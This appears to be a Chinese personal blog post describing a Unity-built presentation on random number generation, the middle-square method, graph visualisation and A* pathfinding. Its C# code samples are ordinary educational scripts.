
    jpg

    数学公式

    ​ 数学公式是在 在线 LaTeX 公式编辑器-编辑器 (latexlive.com) 输出的图片来显示的。

    滚动代码

    jpg

    ​ 一大坨代码放不下一页中,设计了一个滚动条。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    <color="#3f93c2">using</color> System;

    <color="#3f93c2">public class</color> <color="#4ec9b0">RandomNumber</color>
    {
    <color="#3f93c2">private ulong</color> maxshort =<color="#b5cea8"> 65536L</color>;
    <color="#3f93c2">private ulong</color> <color="#ffc0c0">multiplier</color> = <color="#b5cea8">1194211693L</color>;
    <color="#3f93c2">private ulong</color> <color="#ffc0c0">adder</color> = <color="#b5cea8">12345L</color>;
    <color="#3f93c2">private ulong </color><color="#ffc0c0">randSeed</color>;

    <color="#588841">/// <summary>
    /// 构造函数
    /// </summary></color>
    <color="#3f93c2">public</color> <color="#4ec9b0">RandomNumber</color>(<color="#3f93c2">ulong</color> <color="#93d9fe">multiplier</color>, <color="#3f93c2">ulong</color> <color="#93d9fe">adder</color>, <color="#3f93c2">ulong</color> <color="#93d9fe">randSeed</color> = <color="#b5cea8">0</color>)
    {
    <color="#3f93c2">this</color>.multiplier = <color="#93d9fe">multiplier</color>;
    <color="#3f93c2">this</color>.adder = <color="#93d9fe">adder</color>;
    <color="#d8a0df">if</color> (<color="#93d9fe">randSeed</color> == <color="#b5cea8"> 0</color>)
    <color="#57a648">// 返回自 1970-01-01T00:00:00.000Z 起已经过的毫秒数。</color>
    <color="#3f93c2">this</color>.randSeed = (<color="#3f93c2">ulong</color>)<color="#63ba86">DateTime</color>.Now.<color="#dcdcaa">ToFileTimeUtc</color>();
    <color="#d8a0df">else</color>
    <color="#3f93c2">this</color>.randSeed = <color="#93d9fe">randSeed</color>;
    }

    <color="#588841">/// <summary>
    /// 产生 0 到 n - 1 之间的随机整数
    /// 每次计算时, 用线性同余式计算新的种子 randSeed,
    /// 其高 16 为的随机性较好
    /// 此时得到一个 0 ~ 65535 之间的随机整数,
    /// 再将此随机整数映射到 0 ~ n - 1 范围内.
    /// </summary>
    /// <param </color>name<color="#588841">=</color>"<color="#93d9fe">n</color>"<color="#588841">>产生的随机整数上限</param>
    /// <returns>产生的随机整数</returns></color>
    <color="#3f93c2">public ushort</color> <color="#dcdcaa">Random</color>(<color="#3f93c2">ulong</color> <color="#93d9fe">n</color>)
    {
    randSeed = multiplier * randSeed + adder;
    <color="#d8a0df">return</color> (<color="#3f93c2">ushort</color>)((randSeed >> <color="#b5cea8">48</color>) % <color="#93d9fe">n</color>); <color="#57a648">// 取高 16 位</color>
    }

    <color="#588841">/// <summary>
    /// 产生 [0, 1) 之间的随机浮点数
    /// </summary>
    /// <returns>产生的随机浮点数</returns></color>
    <color="#3f93c2">public double</color> <color="#dcdcaa">fRandom</color>()
    {
    <color="#d8a0df">return</color> <color="#dcdcaa">Random</color>(maxshort) / (<color="#3f93c2">double</color>)maxshort;
    }
    }

    ​ 为了让代码高亮,一个一个填的富文本标签……

    3

    jpg

    创建随机数

    ​ 随便创了个 Scene3Controller 类来控制这个场景里的所有逻辑,有点屎山的味道:

    • Update() 里切换的时钟
    • 仿照课本,用 randSeedmultiplieraddern 创建随机数。
    • 将随机数显示在屏幕上,当时为了写出这个隔半秒显示一行的效果还请教了小迷糊,使用了协程 IEnumrator,当年 RMXP 一句话的事情 orz。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    using CodeMonkey.Utils;
    using System.Collections;
    using System.Collections.Generic;
    using System.Reflection;
    using UnityEngine;
    using UnityEngine.UI;

    public class Scene3Controller : MonoBehaviour
    {
    [SerializeField] private GameObject inputField;
    [SerializeField] private Button_UI startBtn;
    [SerializeField] private Image startImage;
    [SerializeField] private Image stopImage;
    [SerializeField] private Text screenText;
    [SerializeField] private RectTransform clockPointer;

    private RandomNumber randomNumber = null;
    private ulong multiplier = 1194211693L;
    private ulong adder = 12345L;
    private ulong randSeed = 0;
    private ulong n = 65536L;

    private bool running = false;
    private float timer = 0;

    // Start is called before the first frame update
    void Awake()
    {
    screenText.text = "";
    inputField.transform.Find("randSeed").GetComponent<InputField>().text = "" + randSeed;
    inputField.transform.Find("multiplier").GetComponent<InputField>().text = "" + multiplier;
    inputField.transform.Find("adder").GetComponent<InputField>().text = "" + adder;
    inputField.transform.Find("n").GetComponent<InputField>().text = "" + n;

    startBtn.ClickFunc = () => {
    if (running)
    {
    StopCoroutine("TestProgram");
    }
    else
    {
    try
    {
    multiplier = ulong.Parse(inputField.transform.Find("multiplier").GetComponent<InputField>().text);
    adder = ulong.Parse(inputField.transform.Find("adder").GetComponent<InputField>().text);
    randSeed = ulong.Parse(inputField.transform.Find("randSeed").GetComponent<InputField>().text);
    n = ulong.Parse(inputField.transform.Find("n").GetComponent<InputField>().text);
    randomNumber = new RandomNumber(multiplier, adder, randSeed);
    }
    catch
    {
    Debug.Log("失败!");
    randomNumber = new RandomNumber(multiplier, adder, randSeed);
    }
    startBtn.hoverBehaviour_Image = stopImage;
    StartCoroutine("TestProgram");
    }
    stopImage.gameObject.SetActive(!running);
    startImage.gameObject.SetActive(running);
    running = !running;
    };
    }

    // Update is called once per frame
    void Update()
    {
    try
    {
    if (ulong.Parse(inputField.transform.Find("randSeed").GetComponent<InputField>().text) == 0)
    {
    inputField.transform.Find("randSeed").Find("Text").GetComponent<Text>().color = new Color(1, 0.75f, 0.75f);
    }
    else
    {
    inputField.transform.Find("randSeed").Find("Text").GetComponent<Text>().color = new Color(181f / 255f, 206f / 255f, 168 / 255f);
    }
    }
    catch
    {
    inputField.transform.Find("randSeed").Find("Text").GetComponent<Text>().color = new Color(181f / 255f, 206f / 255f, 168 / 255f);
    }

    if(timer<1f)
    {
    timer += Time.deltaTime;
    }
    else
    {
    timer = 0f;
    clockPointer.Rotate(new Vector3(0, 0, -90));
    }

    }

    /// <summary>
    /// 测试程序
    /// </summary>
    private IEnumerator TestProgram()
    {
    screenText.text = "";
    for (int i=0;i<10;i++)
    {
    screenText.text += "a<size=20>"+ i + "</size>=" + randomNumber.Random2(n) + "\n";
    yield return new WaitForSeconds(.5f);
    }
    stopImage.gameObject.SetActive(!running);
    startImage.gameObject.SetActive(running);
    running = !running;
    }
    }

    4

    jpg

    平方取中法

    ​ 仿照课本写的平方取中法,数字中间的部分蓝色高亮。

    jpg

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    using System.Collections;
    using System.Collections.Generic;
    using UnityEditor;
    using UnityEngine;
    using UnityEngine.UI;

    public class MiddleSquareMethod : MonoBehaviour
    {
    private int length = 6;
    private ulong num = 675248L;
    private string str = "";
    private Text text;
    private float timer = 0;
    // Start is called before the first frame update
    void Awake()
    {
    text = GetComponent<Text>();
    }

    // Update is called once per frame
    void Update()
    {
    if(timer < 1f)
    {
    timer += Time.deltaTime;
    }
    else
    {
    timer = 0f;
    str = "";
    for (int i = 0; i < 2 * length - (num * num).ToString().Length; i++)
    {
    str += "0";
    }
    Debug.Log(str);
    str += (num * num).ToString();
    num = ulong.Parse(str.Substring(length / 2, length));
    text.text = str.Substring(0, length / 2) + "<color=\"#0000ff\">" + str.Substring(length / 2, length) + "</color>" + str.Substring(3 * length / 2, length / 2);
    }
    }
    }

    5

    jpg

    数据可视化

    ​ 从 Create a Graph - Unity Tutorial - YouTube 整的一份 Unity 下画曲线图和柱状图的东东。

    jpg

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
    152
    153
    154
    155
    156
    157
    158
    159
    160
    161
    162
    163
    164
    165
    166
    167
    168
    169
    170
    171
    172
    173
    174
    175
    176
    177
    178
    179
    180
    181
    182
    183
    184
    185
    186
    187
    188
    189
    190
    191
    192
    193
    194
    195
    196
    197
    198
    199
    200
    201
    202
    203
    204
    205
    206
    207
    208
    209
    210
    211
    212
    213
    214
    215
    216
    217
    218
    219
    220
    221
    222
    223
    224
    225
    226
    227
    228
    229
    230
    231
    232
    233
    234
    235
    236
    237
    238
    239
    240
    241
    242
    243
    244
    245
    246
    247
    248
    249
    250
    251
    252
    253
    254
    255
    256
    257
    258
    259
    260
    261
    262
    263
    264
    265
    266
    267
    268
    269
    270
    271
    272
    273
    274
    275
    276
    277
    278
    279
    280
    281
    282
    283
    284
    285
    286
    287
    288
    289
    290
    291
    292
    293
    294
    295
    296
    297
    298
    299
    300
    301
    302
    303
    304
    305
    306
    307
    308
    309
    310
    311
    312
    313
    314
    315
    316
    317
    318
    319
    320
    321
    322
    323
    324
    325
    326
    327
    328
    329
    330
    331
    332
    333
    334
    335
    336
    337
    338
    339
    340
    341
    342
    343
    344
    345
    346
    347
    348
    349
    350
    351
    352
    353
    354
    355
    356
    357
    358
    359
    360
    361
    362
    363
    364
    365
    366
    367
    368
    369
    370
    371
    372
    373
    374
    375
    376
    377
    378
    379
    380
    381
    382
    383
    384
    385
    386
    387
    388
    389
    390
    391
    392
    393
    394
    395
    396
    397
    398
    399
    400
    401
    402
    403
    404
    405
    406
    407
    408
    409
    410
    411
    412
    413
    414
    415
    416
    417
    418
    419
    420
    421
    422
    423
    424
    425
    426
    427
    428
    429
    430
    431
    432
    433
    434
    435
    436
    437
    438
    439
    440
    441
    442
    443
    444
    445
    446
    447
    448
    449
    450
    451
    452
    453
    454
    455
    456
    457
    458
    459
    460
    461
    462
    463
    464
    465
    466
    467
    468
    469
    470
    471
    472
    473
    474
    475
    476
    477
    478
    479
    480
    481
    482
    483
    484
    485
    486
    487
    488
    489
    490
    491
    492
    493
    494
    495
    496
    497
    498
    499
    500
    501
    502
    503
    504
    505
    506
    507
    508
    509
    510
    511
    512
    513
    514
    515
    516
    517
    518
    519
    520
    521
    522
    523
    524
    525
    526
    527
    528
    529
    using System;
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using UnityEngine.UI;
    using CodeMonkey.Utils;

    public class Window_Graph : MonoBehaviour {

    public static Window_Graph instance;

    [SerializeField] private Sprite dotSprite;
    private RectTransform graphContainer;
    private RectTransform labelTemplateX;
    private RectTransform labelTemplateY;
    private RectTransform dashContainer;
    private RectTransform dashTemplateX;
    private RectTransform dashTemplateY;
    private List<GameObject> gameObjectList;
    private List<IGraphVisualObject> graphVisualObjectList;
    private GameObject tooltipGameObject;
    private List<RectTransform> yLabelList;

    // Cached values
    public List<int> valueList;
    private IGraphVisual graphVisual;
    private int maxVisibleValueAmount;
    private Func<int, string> getAxisLabelX;
    private Func<float, string> getAxisLabelY;
    private float xSize;
    [SerializeField] private bool startYScaleAtZero = true;

    private void Awake() {
    instance = this;
    // Grab base objects references
    graphContainer = transform.Find("graphContainer").GetComponent<RectTransform>();
    labelTemplateX = graphContainer.Find("labelTemplateX").GetComponent<RectTransform>();
    labelTemplateY = graphContainer.Find("labelTemplateY").GetComponent<RectTransform>();
    dashContainer = graphContainer.Find("dashContainer").GetComponent<RectTransform>();
    dashTemplateX = dashContainer.Find("dashTemplateX").GetComponent<RectTransform>();
    dashTemplateY = dashContainer.Find("dashTemplateY").GetComponent<RectTransform>();
    tooltipGameObject = graphContainer.Find("tooltip").gameObject;

    gameObjectList = new List<GameObject>();
    yLabelList = new List<RectTransform>();
    graphVisualObjectList = new List<IGraphVisualObject>();

    IGraphVisual lineGraphVisual = new LineGraphVisual(graphContainer, dotSprite, Color.green, new Color(1, 1, 1, .5f));
    IGraphVisual barChartVisual = new BarChartVisual(graphContainer, Color.white, .8f);

    // Set up buttons
    transform.Find("barChartBtn").GetComponent<Button_UI>().ClickFunc = () => {
    SetGraphVisual(barChartVisual);
    };
    transform.Find("lineGraphBtn").GetComponent<Button_UI>().ClickFunc = () => {
    SetGraphVisual(lineGraphVisual);
    };

    HideTooltip();

    //// Set up base values
    List<int> valueList = new List<int>() { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 };
    ShowGraph(valueList, barChartVisual, -1, (int _i) => "" + (_i), (float _f) => "" + Mathf.RoundToInt(_f));

    }

    public static void ShowTooltip_Static(string tooltipText, Vector2 anchoredPosition) {
    instance.ShowTooltip(tooltipText, anchoredPosition);
    }

    private void ShowTooltip(string tooltipText, Vector2 anchoredPosition) {
    // Show Tooltip GameObject
    tooltipGameObject.SetActive(true);

    tooltipGameObject.GetComponent<RectTransform>().anchoredPosition = anchoredPosition;

    Text tooltipUIText = tooltipGameObject.transform.Find("text").GetComponent<Text>();
    tooltipUIText.text = tooltipText;

    float textPaddingSize = 4f;
    Vector2 backgroundSize = new Vector2(
    tooltipUIText.preferredWidth + textPaddingSize * 2f,
    tooltipUIText.preferredHeight + textPaddingSize * 2f
    );

    tooltipGameObject.transform.Find("background").GetComponent<RectTransform>().sizeDelta = backgroundSize;

    // UI Visibility Sorting based on Hierarchy, SetAsLastSibling in order to show up on top
    tooltipGameObject.transform.SetAsLastSibling();
    }

    public static void HideTooltip_Static() {
    instance.HideTooltip();
    }

    private void HideTooltip() {
    tooltipGameObject.SetActive(false);
    }

    private void SetGetAxisLabelX(Func<int, string> getAxisLabelX) {
    ShowGraph(this.valueList, this.graphVisual, this.maxVisibleValueAmount, getAxisLabelX, this.getAxisLabelY);
    }

    private void SetGetAxisLabelY(Func<float, string> getAxisLabelY) {
    ShowGraph(this.valueList, this.graphVisual, this.maxVisibleValueAmount, this.getAxisLabelX, getAxisLabelY);
    }

    private void IncreaseVisibleAmount() {
    ShowGraph(this.valueList, this.graphVisual, this.maxVisibleValueAmount + 1, this.getAxisLabelX, this.getAxisLabelY);
    }

    private void DecreaseVisibleAmount() {
    ShowGraph(this.valueList, this.graphVisual, this.maxVisibleValueAmount - 1, this.getAxisLabelX, this.getAxisLabelY);
    }

    private void SetGraphVisual(IGraphVisual graphVisual) {
    ShowGraph(this.valueList, graphVisual, this.maxVisibleValueAmount, this.getAxisLabelX, this.getAxisLabelY);
    }

    private void ShowGraph(List<int> valueList, IGraphVisual graphVisual, int maxVisibleValueAmount = -1, Func<int, string> getAxisLabelX = null, Func<float, string> getAxisLabelY = null) {
    this.valueList = valueList;
    this.graphVisual = graphVisual;
    this.getAxisLabelX = getAxisLabelX;
    this.getAxisLabelY = getAxisLabelY;

    if (maxVisibleValueAmount <= 0) {
    // Show all if no amount specified
    maxVisibleValueAmount = valueList.Count;
    }
    if (maxVisibleValueAmount > valueList.Count) {
    // Validate the amount to show the maximum
    maxVisibleValueAmount = valueList.Count;
    }

    this.maxVisibleValueAmount = maxVisibleValueAmount;

    // Test for label defaults
    if (getAxisLabelX == null) {
    getAxisLabelX = delegate (int _i) { return _i.ToString(); };
    }
    if (getAxisLabelY == null) {
    getAxisLabelY = delegate (float _f) { return Mathf.RoundToInt(_f).ToString(); };
    }

    // Clean up previous graph
    foreach (GameObject gameObject in gameObjectList) {
    Destroy(gameObject);
    }
    gameObjectList.Clear();
    yLabelList.Clear();

    foreach (IGraphVisualObject graphVisualObject in graphVisualObjectList) {
    graphVisualObject.CleanUp();
    }
    graphVisualObjectList.Clear();

    graphVisual.CleanUp();

    // Grab the width and height from the container
    float graphWidth = graphContainer.sizeDelta.x;
    float graphHeight = graphContainer.sizeDelta.y;

    float yMinimum, yMaximum;
    CalculateYScale(out yMinimum, out yMaximum);

    // Set the distance between each point on the graph
    xSize = graphWidth / (maxVisibleValueAmount + 1);

    // Cycle through all visible data points
    int xIndex = 0;
    for (int i = Mathf.Max(valueList.Count - maxVisibleValueAmount, 0); i < valueList.Count; i++) {
    float xPosition = xSize + xIndex * xSize;
    float yPosition = ((valueList[i] - yMinimum) / (yMaximum - yMinimum)) * graphHeight;

    // Add data point visual
    string tooltipText = getAxisLabelY(valueList[i]);
    IGraphVisualObject graphVisualObject = graphVisual.CreateGraphVisualObject(new Vector2(xPosition, yPosition), xSize, tooltipText);
    graphVisualObjectList.Add(graphVisualObject);

    // Duplicate the x label template
    RectTransform labelX = Instantiate(labelTemplateX);
    labelX.SetParent(graphContainer, false);
    labelX.gameObject.SetActive(true);
    labelX.anchoredPosition = new Vector2(xPosition, -7f);
    labelX.GetComponent<Text>().text = getAxisLabelX(i);
    gameObjectList.Add(labelX.gameObject);

    // Duplicate the x dash template
    RectTransform dashX = Instantiate(dashTemplateX);
    dashX.SetParent(dashContainer, false);
    dashX.gameObject.SetActive(true);
    dashX.anchoredPosition = new Vector2(xPosition, -3f);
    gameObjectList.Add(dashX.gameObject);

    xIndex++;
    }

    // Set up separators on the y axis
    int separatorCount = 10;
    for (int i = 0; i <= separatorCount; i++) {
    // Duplicate the label template
    RectTransform labelY = Instantiate(labelTemplateY);
    labelY.SetParent(graphContainer, false);
    labelY.gameObject.SetActive(true);
    float normalizedValue = i * 1f / separatorCount;
    labelY.anchoredPosition = new Vector2(-7f, normalizedValue * graphHeight);
    labelY.GetComponent<Text>().text = getAxisLabelY(yMinimum + (normalizedValue * (yMaximum - yMinimum)));
    yLabelList.Add(labelY);
    gameObjectList.Add(labelY.gameObject);

    // Duplicate the dash template
    RectTransform dashY = Instantiate(dashTemplateY);
    dashY.SetParent(dashContainer, false);
    dashY.gameObject.SetActive(true);
    dashY.anchoredPosition = new Vector2(-4f, normalizedValue * graphHeight);
    gameObjectList.Add(dashY.gameObject);
    }
    }

    public void UpdateValue(int index, int value) {
    float yMinimumBefore, yMaximumBefore;
    CalculateYScale(out yMinimumBefore, out yMaximumBefore);

    valueList[index] = value;

    float graphWidth = graphContainer.sizeDelta.x;
    float graphHeight = graphContainer.sizeDelta.y;

    float yMinimum, yMaximum;
    CalculateYScale(out yMinimum, out yMaximum);

    bool yScaleChanged = yMinimumBefore != yMinimum || yMaximumBefore != yMaximum;

    if (!yScaleChanged) {
    // Y Scale did not change, update only this value
    float xPosition = xSize + index * xSize;
    float yPosition = ((value - yMinimum) / (yMaximum - yMinimum)) * graphHeight;

    // Add data point visual
    string tooltipText = getAxisLabelY(value);
    graphVisualObjectList[index].SetGraphVisualObjectInfo(new Vector2(xPosition, yPosition), xSize, tooltipText);
    } else {
    // Y scale changed, update whole graph and y axis labels
    // Cycle through all visible data points
    int xIndex = 0;
    for (int i = Mathf.Max(valueList.Count - maxVisibleValueAmount, 0); i < valueList.Count; i++) {
    float xPosition = xSize + xIndex * xSize;
    float yPosition = ((valueList[i] - yMinimum) / (yMaximum - yMinimum)) * graphHeight;

    // Add data point visual
    string tooltipText = getAxisLabelY(valueList[i]);
    graphVisualObjectList[xIndex].SetGraphVisualObjectInfo(new Vector2(xPosition, yPosition), xSize, tooltipText);

    xIndex++;
    }

    for (int i = 0; i < yLabelList.Count; i++) {
    float normalizedValue = i * 1f / yLabelList.Count;
    yLabelList[i].GetComponent<Text>().text = getAxisLabelY(yMinimum + (normalizedValue * (yMaximum - yMinimum)));
    }
    }
    }

    private void CalculateYScale(out float yMinimum, out float yMaximum) {
    // Identify y Min and Max values
    yMaximum = valueList[0];
    yMinimum = valueList[0];

    for (int i = Mathf.Max(valueList.Count - maxVisibleValueAmount, 0); i < valueList.Count; i++) {
    int value = valueList[i];
    if (value > yMaximum) {
    yMaximum = value;
    }
    if (value < yMinimum) {
    yMinimum = value;
    }
    }

    float yDifference = yMaximum - yMinimum;
    if (yDifference <= 0) {
    yDifference = 5f;
    }
    yMaximum = yMaximum + (yDifference * 0.2f);
    yMinimum = yMinimum - (yDifference * 0.2f);

    if (startYScaleAtZero) {
    yMinimum = 0f; // Start the graph at zero
    }
    }

    /*
    * Interface definition for showing visual for a data point
    * */
    private interface IGraphVisual {

    IGraphVisualObject CreateGraphVisualObject(Vector2graphPosition, float graphPositionWidth, string tooltipText);
    void CleanUp();

    }

    /*
    * Represents a single Visual Object in the graph
    * */
    private interface IGraphVisualObject {

    void SetGraphVisualObjectInfo(Vector2graphPosition, float graphPositionWidth, string tooltipText);
    void CleanUp();

    }

    /*
    * Displays data points as a Bar Chart
    * */
    private class BarChartVisual : IGraphVisual {

    private RectTransform graphContainer;
    private Color barColor;
    private float barWidthMultiplier;

    public BarChartVisual(RectTransform graphContainer, Color barColor, float barWidthMultiplier) {
    this.graphContainer = graphContainer;
    this.barColor = barColor;
    this.barWidthMultiplier = barWidthMultiplier;
    }

    public void CleanUp() {
    }

    public IGraphVisualObject CreateGraphVisualObject(Vector2graphPosition, float graphPositionWidth, string tooltipText) {
    GameObject barGameObject = CreateBar(graphPosition, graphPositionWidth);

    BarChartVisualObject barChartVisualObject = new BarChartVisualObject(barGameObject, barWidthMultiplier);
    barChartVisualObject.SetGraphVisualObjectInfo(graphPosition, graphPositionWidth, tooltipText);

    return barChartVisualObject;
    }

    private GameObject CreateBar(Vector2graphPosition, float barWidth) {
    GameObject gameObject = new GameObject("bar", typeof(Image));
    gameObject.transform.SetParent(graphContainer, false);
    gameObject.GetComponent<Image>().color = barColor;
    RectTransform rectTransform = gameObject.GetComponent<RectTransform>();
    rectTransform.anchoredPosition = new Vector2(graphPosition.x, 0f);
    rectTransform.sizeDelta = new Vector2(barWidth * barWidthMultiplier, graphPosition.y);
    rectTransform.anchorMin = new Vector2(0, 0);
    rectTransform.anchorMax = new Vector2(0, 0);
    rectTransform.pivot = new Vector2(.5f, 0f);

    // Add Button_UI Component which captures UI Mouse Events
    Button_UI barButtonUI = gameObject.AddComponent<Button_UI>();

    return gameObject;
    }

    public class BarChartVisualObject : IGraphVisualObject {

    private GameObject barGameObject;
    private float barWidthMultiplier;

    public BarChartVisualObject(GameObject barGameObject, float barWidthMultiplier) {
    this.barGameObject = barGameObject;
    this.barWidthMultiplier = barWidthMultiplier;
    }

    public void SetGraphVisualObjectInfo(Vector2graphPosition, float graphPositionWidth, string tooltipText) {
    RectTransform rectTransform = barGameObject.GetComponent<RectTransform>();
    rectTransform.anchoredPosition = new Vector2(graphPosition.x, 0f);
    rectTransform.sizeDelta = new Vector2(graphPositionWidth * barWidthMultiplier, graphPosition.y);

    Button_UI barButtonUI = barGameObject.GetComponent<Button_UI>();

    // Show Tooltip on Mouse Over
    barButtonUI.MouseOverOnceFunc = () => {
    ShowTooltip_Static(tooltipText, graphPosition);
    };

    // Hide Tooltip on Mouse Out
    barButtonUI.MouseOutOnceFunc = () => {
    HideTooltip_Static();
    };
    }

    public void CleanUp() {
    Destroy(barGameObject);
    }
    }
    }

    /*
    * Displays data points as a Line Graph
    * */
    private class LineGraphVisual : IGraphVisual {

    private RectTransform graphContainer;
    private Sprite dotSprite;
    private LineGraphVisualObject lastLineGraphVisualObject;
    private Color dotColor;
    private Color dotConnectionColor;

    public LineGraphVisual(RectTransform graphContainer, Sprite dotSprite, Color dotColor, Color dotConnectionColor) {
    this.graphContainer = graphContainer;
    this.dotSprite = dotSprite;
    this.dotColor = dotColor;
    this.dotConnectionColor = dotConnectionColor;
    lastLineGraphVisualObject = null;
    }

    public void CleanUp() {
    lastLineGraphVisualObject = null;
    }


    public IGraphVisualObject CreateGraphVisualObject(Vector2graphPosition, float graphPositionWidth, string tooltipText) {
    GameObject dotGameObject = CreateDot(graphPosition);


    GameObject dotConnectionGameObject = null;
    if (lastLineGraphVisualObject != null) {
    dotConnectionGameObject = CreateDotConnection(lastLineGraphVisualObject.GetGraphPosition(), dotGameObject.GetComponent<RectTransform>().anchoredPosition);
    }

    LineGraphVisualObject lineGraphVisualObject = new LineGraphVisualObject(dotGameObject, dotConnectionGameObject, lastLineGraphVisualObject);
    lineGraphVisualObject.SetGraphVisualObjectInfo(graphPosition, graphPositionWidth, tooltipText);

    lastLineGraphVisualObject = lineGraphVisualObject;

    return lineGraphVisualObject;
    }

    private GameObject CreateDot(Vector2 anchoredPosition) {
    GameObject gameObject = new GameObject("dot", typeof(Image));
    gameObject.transform.SetParent(graphContainer, false);
    gameObject.GetComponent<Image>().sprite = dotSprite;
    gameObject.GetComponent<Image>().color = dotColor;
    RectTransform rectTransform = gameObject.GetComponent<RectTransform>();
    rectTransform.anchoredPosition = anchoredPosition;
    rectTransform.sizeDelta = new Vector2(11, 11);
    rectTransform.anchorMin = new Vector2(0, 0);
    rectTransform.anchorMax = new Vector2(0, 0);

    // Add Button_UI Component which captures UI Mouse Events
    Button_UI dotButtonUI = gameObject.AddComponent<Button_UI>();

    return gameObject;
    }

    private GameObject CreateDotConnection(Vector2 dotPositionA, Vector2 dotPositionB) {
    GameObject gameObject = new GameObject("dotConnection", typeof(Image));
    gameObject.transform.SetParent(graphContainer, false);
    gameObject.GetComponent<Image>().color = dotConnectionColor;
    gameObject.GetComponent<Image>().raycastTarget = false;
    RectTransform rectTransform = gameObject.GetComponent<RectTransform>();
    Vector2 dir = (dotPositionB - dotPositionA).normalized;
    float distance = Vector2.Distance(dotPositionA, dotPositionB);
    rectTransform.anchorMin = new Vector2(0, 0);
    rectTransform.anchorMax = new Vector2(0, 0);
    rectTransform.sizeDelta = new Vector2(distance, 3f);
    rectTransform.anchoredPosition = dotPositionA + dir * distance * .5f;
    rectTransform.localEulerAngles = new Vector3(0, 0, UtilsClass.GetAngleFromVectorFloat(dir));
    return gameObject;
    }


    public class LineGraphVisualObject : IGraphVisualObject {

    public event EventHandler OnChangedGraphVisualObjectInfo;

    private GameObject dotGameObject;
    private GameObject dotConnectionGameObject;
    private LineGraphVisualObject lastVisualObject;

    public LineGraphVisualObject(GameObject dotGameObject, GameObject dotConnectionGameObject, LineGraphVisualObject lastVisualObject) {
    this.dotGameObject = dotGameObject;
    this.dotConnectionGameObject = dotConnectionGameObject;
    this.lastVisualObject = lastVisualObject;

    if (lastVisualObject != null) {
    lastVisualObject.OnChangedGraphVisualObjectInfo += LastVisualObject_OnChangedGraphVisualObjectInfo;
    }
    }

    private void LastVisualObject_OnChangedGraphVisualObjectInfo(object sender, EventArgs e) {
    UpdateDotConnection();
    }

    public void SetGraphVisualObjectInfo(Vector2graphPosition, float graphPositionWidth, string tooltipText) {
    RectTransform rectTransform = dotGameObject.GetComponent<RectTransform>();
    rectTransform.anchoredPosition = graphPosition;

    UpdateDotConnection();

    Button_UI dotButtonUI = dotGameObject.GetComponent<Button_UI>();

    // Show Tooltip on Mouse Over
    dotButtonUI.MouseOverOnceFunc = () => {
    ShowTooltip_Static(tooltipText, graphPosition);
    };

    // Hide Tooltip on Mouse Out
    dotButtonUI.MouseOutOnceFunc = () => {
    HideTooltip_Static();
    };

    if (OnChangedGraphVisualObjectInfo != null) OnChangedGraphVisualObjectInfo(this, EventArgs.Empty);
    }

    public void CleanUp() {
    Destroy(dotGameObject);
    Destroy(dotConnectionGameObject);
    }

    public Vector2 GetGraphPosition() {
    RectTransform rectTransform = dotGameObject.GetComponent<RectTransform>();
    return rectTransform.anchoredPosition;
    }

    private void UpdateDotConnection() {
    if (dotConnectionGameObject != null) {
    RectTransform dotConnectionRectTransform = dotConnectionGameObject.GetComponent<RectTransform>();
    Vector2 dir = (lastVisualObject.GetGraphPosition() - GetGraphPosition()).normalized;
    float distance = Vector2.Distance(GetGraphPosition(), lastVisualObject.GetGraphPosition());
    dotConnectionRectTransform.sizeDelta = new Vector2(distance, 3f);
    dotConnectionRectTransform.anchoredPosition = GetGraphPosition() + dir * distance * .5f;
    dotConnectionRectTransform.localEulerAngles = new Vector3(0, 0, UtilsClass.GetAngleFromVectorFloat(dir));
    }
    }
    }
    }
    }

    6

    jpg

    A* 算法

    这玩意当时还写了博客:[Unity-Unity 中的网格系统及 AStar 算法-Zi-Zi’s Journey](…//Unity-Unity 中的网格系统及 AStar 算法/)

    jpg jpg jpg
    **布局**

    ​ 从 主页 - Chess.com 抄的素材和配色。其实这个 PPT 没有上去讲,就当练手了。

    ​ 背景颜色是 #312E2B

    场景逻辑

    ​ 随便整了 Test 类控制所有逻辑,咱就是一个敏捷开发。

    • 切换场景,只有一个场景,一个 Prefab 表示一页 PPT。不仅用鼠标,键盘 A 和 D 也可翻页。
    • 可以使用三种算法:
      • Dijkstra
      • A*
      • BFS
    • 两种棋子代表:8 方向和 4 方向。Z 键切换。

    jpg

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
